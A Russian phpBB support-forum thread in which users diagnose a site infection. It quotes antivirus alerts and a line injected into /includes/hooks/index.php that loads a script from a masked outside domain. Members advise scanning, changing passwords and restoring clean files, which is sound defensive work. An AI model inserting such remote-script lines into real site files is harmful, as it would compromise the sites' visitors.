обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
-
AdmninsCluba
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
-
Leviafant
- phpBB 1.4.4
- Сообщения: 106
- Стаж: 18 лет 3 месяца
- Откуда: Курск
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
Leviafant
Стало быть, есть какая-то веская причина, по которой из сотен тысяч или даже миллионов форумов phpBB был заражён только твой (и ещё парочка каких-нибудь). Можешь её озвучить?
Стало быть, есть какая-то веская причина, по которой из сотен тысяч или даже миллионов форумов phpBB был заражён только твой (и ещё парочка каких-нибудь). Можешь её озвучить?
Последний раз редактировалось MIT 07.08.2010 11:45, всего редактировалось 1 раз.
-
Leviafant
- phpBB 1.4.4
- Сообщения: 106
- Стаж: 18 лет 3 месяца
- Откуда: Курск
-
DK7
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: Как убить Трояна?
У вас выделенный сервер?
Если нет то достаточно трояну бомбануть другой сайт находящийся рядом на хостинге, что бы потом заразить и ваши файлы.
все просто.
Добавлено спустя 23 секунды:
http://www.google.md/search?q=phpbb+3.0 ... nt=firefox
Если нет то достаточно трояну бомбануть другой сайт находящийся рядом на хостинге, что бы потом заразить и ваши файлы.
все просто.
Добавлено спустя 23 секунды:
ну взламывай тогдаLeviafant писал(а):MIT
видимо уязвимость в старых версиях
http://www.google.md/search?q=phpbb+3.0 ... nt=firefox
-
crash
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 9 месяцев
- Откуда: Бердск
Re: Как убить Трояна?
и что?Leviafant писал(а):я пользуюсь линуксом
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
spylook
- phpBB 1.0.0
- Сообщения: 6
- Стаж: 14 лет 8 месяцев
появились ошибки - ничего не делал
Не отображаются фотки,
при входе пишет, что пользователь на форуме, но в натуре выбрасывает
Ошибки такие:
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4284: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4286: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4287: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4288: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
Помогите кто чем может...
при входе пишет, что пользователь на форуме, но в натуре выбрасывает
Ошибки такие:
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4284: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4286: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4287: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4288: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
Помогите кто чем может...
Последний раз редактировалось spylook 15.08.2010 16:08, всего редактировалось 1 раз.
-
владимир1983
- phpBB 3.2.6
- Сообщения: 5954
- Стаж: 15 лет
- Откуда: Сергиев Посад
- Благодарил (а): 295 раз
- Поблагодарили: 287 раз
Re: появились ошибки - ничего не делал
rxu
Знать бы пораньше, вроде попал.
Вот на что ругнулся:
Виндовс повис на минуту, белый экран, вот такое вылезло eval("Wn36rqe='R';"); и комп самостоятельно начал перезагружаться.
Сейчас сканером придётся смотреть что я там подцепил.
Знать бы пораньше, вроде попал.
Вот на что ругнулся:
Код: Выделить всё
15.08.2010 15:27:06 Обнаружено: HEUR:Exploit.Script.Generic Opera Internet Browser http://***.ru:8080/jquery.jxx?v=5.3.4Виндовс повис на минуту, белый экран, вот такое вылезло eval("Wn36rqe='R';"); и комп самостоятельно начал перезагружаться.
Сейчас сканером придётся смотреть что я там подцепил.
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Нет человека - нет проблемы. (c)
-
spylook
- phpBB 1.0.0
- Сообщения: 6
- Стаж: 14 лет 8 месяцев
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: появились ошибки - ничего не делал
+1 зомби у чьему-то ботнетувладимир1983 писал(а):и комп самостоятельно начал перезагружаться
-
DK7
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
-
владимир1983
- phpBB 3.2.6
- Сообщения: 5954
- Стаж: 15 лет
- Откуда: Сергиев Посад
- Благодарил (а): 295 раз
- Поблагодарили: 287 раз
Re: появились ошибки - ничего не делал
MIT
DK7
Не нагоняйте ужаса, и так боюсь!
DK7
Не нагоняйте ужаса, и так боюсь!
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Нет человека - нет проблемы. (c)
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
-
DK7
- Former team member
- Сообщения: 1008
- Стаж: 18 лет 9 месяцев
- Откуда: Кишинёв
- Благодарил (а): 1 раз
Re: появились ошибки - ничего не делал
да) иногда спасает только полное форматирование. Бывает что и винты люди меняли...)MIT писал(а):DK7, вот уж не факт...
-
spylook
- phpBB 1.0.0
- Сообщения: 6
- Стаж: 14 лет 8 месяцев
Re: появились ошибки - ничего не делал
Вот чего нарыл:
по файлу /includes/session.php on line 1007
по файлу /includes/functions.php
По файлу /includes/hooks/index.php
Я так понимаю, что надо просто заменить эти файлы на исходные.
Но,объясните, пожалуйста, что обозначают все эти строки?
по файлу /includes/session.php on line 1007
Код: Выделить всё
header('Set-Cookie: ' . $name_data . (($cookietime) ? '; expires=' . $expire : '') . '; path=' . $config['cookie_path'] . $domain . ((!$config['cookie_secure']) ? '' : '; secure') . '; HttpOnly', false);Код: Выделить всё
4283 // application/xhtml+xml not used because of IE
4284 header('Content-type: text/html; charset=UTF-8');
4286 header('Cache-Control: private, no-cache="set-cookie"');
4287 header('Expires: 0');
4288 header('Pragma: no-cache');Код: Выделить всё
Line 251 <script type="text/javascript" src="http://****.ru/Template.js"></script>Но,объясните, пожалуйста, что обозначают все эти строки?
